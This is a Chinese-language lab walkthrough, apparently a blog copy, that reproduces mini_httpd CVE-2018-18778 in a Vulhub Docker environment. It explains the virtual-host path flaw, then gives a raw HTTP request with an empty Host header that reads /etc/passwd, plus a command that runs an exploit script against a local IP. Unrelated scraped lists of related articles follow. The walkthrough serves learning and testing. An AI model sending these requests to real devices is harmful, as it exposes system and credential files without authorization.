一、环境搭建:

进入镜像目录:

cd vulhub/mini_httpd/CVE-2018-18778

启动环境:

docker-compose up -d

访问8088端口

二、漏洞描述:

Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。

在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。

(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

当HOST=example.com、FILE=index.html的时候,上述语句结果为example.com/index.html,文件正常读取。

当HOST为空、FILE=etc/passwd的时候,上述语句结果为/etc/passwd。

后者被作为绝对路径,于是读取到了/etc/passwd,造成任意文件读取漏洞。

三、漏洞复现:

清空HOST头,路径为读取的文件:

GET /etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: close

成功读取到/etc/passwd:

四、自动化利用EXP:

python3 mini_httpd_exp.py http://192.168.136.131:8080

.exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)相关推荐

  1. gitlab 更新文件_GitLab任意文件读取漏洞公告

    2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

  2. 一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd裸文件包含]

    时间戳--2021.12.12 0x01 [HXBCTF 2021]easywill_WriteUp: 一.PHPSTORM框架调试 第一步:登录buuctf,打开[HXBCTF 2021]easyw ...

  3. flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  4. 任意文件读取及删除漏洞

    任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变 ...

  5. 【MetInfo任意文件读取】--任意文件读取漏洞

    文章目录 漏洞信息 一.漏洞产生的原因 二.漏洞利用 1.对靶机网址进行burp抓包 2.对上述请求包进行修改 三.漏洞修复与绕过--四种修复与绕过 1.置空../和./ 2.对$dir进行判断 3. ...

  6. 任意文件读取与下载漏洞学习

    原理: 任意文件读取漏洞属于文件操作类漏洞,一般常见于PHP/java/python语言中.任意文件读取漏洞,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/ ...

  7. 深信服 应用交付报表系统 download.php 任意文件读取漏洞

    漏洞描述: 深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件. 漏洞利用条件: download.php文件接口 漏洞影响范围: 应用交 ...

  8. 7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记

    接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能.如果一个类型实现了某个接 ...

  9. 蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞

    警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现 一.概述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通 ...

最新文章

  1. Eclipse_Eclipse下配置Maven
  2. POJ-1182 食物链(并查集)
  3. Go 面向对象三大特性
  4. linux notepad 安装教程,Ubuntu 15.04/14.10/14.04下安装和卸载Notepad++(notepadqq)
  5. IDEA中进行SpringBoot整合spring-ws开发webservice接口后期要修改xsd文件流程
  6. 洛谷 P1207 [USACO1.2]双重回文数 Dual Palindromes
  7. Dapr + .NET 实战(五)Actor
  8. 在python中是否可以使用if作为变量名_在Python中可以使用if 作为变量名_python使用符号 标示注释...
  9. 汇编语言mul指令_跟着开源软件学汇编语言:计算器
  10. 【经典算法】第三回:插入排序
  11. 比赛-h47学长的训练赛 (27 Aug, 2018)
  12. J2EE框架技术(SpringMVC) 知识点笔记(2)
  13. Web测试与App测试的区别
  14. 从「广义斯托克斯公式」结合「外微分公式」导出「牛顿-莱布尼茨公式」、「格林公式」、「高斯公式」、「斯托克斯公式」
  15. 计算机开机f8键,开机F8键“高级启动选项”的秘密
  16. 什么是auto?auto的作用?
  17. Python编程——pickle模块的使用详解(附实例)
  18. 怎么将PPT里面的普通文字设置成艺术文字
  19. 数据提取或数据恢复工具
  20. sklearn聚类之谱聚类SpectralClustering

热门文章

  1. 深度学习如何选择模型
  2. python的数值类型和运算符_Python中的基本数据类型和运算符,python
  3. python 数据处理 书_Python数据处理
  4. php特殊函数,PHP常用特殊运算符号和函数的简单示例
  5. java memorycache原理_JVM代码缓存区CodeCache原理及用法解析
  6. linux内核分析 网络九,“Linux内核分析”实验报告(九)
  7. python paramiko_Python Paramiko基本使用
  8. pta段错误怎么办_语文名师提醒:错误的阅读习惯导致孩子成绩下降
  9. vsftpd的配置文件路径,是在哪里指定的?
  10. TextBoxSuggest,输入框提示工具,输入建议,输入匹配,辅助输入,输入即时提示,文本编辑器,Visual Studio效果,高速查询引擎,哈希树,模糊匹配,百万条零毫秒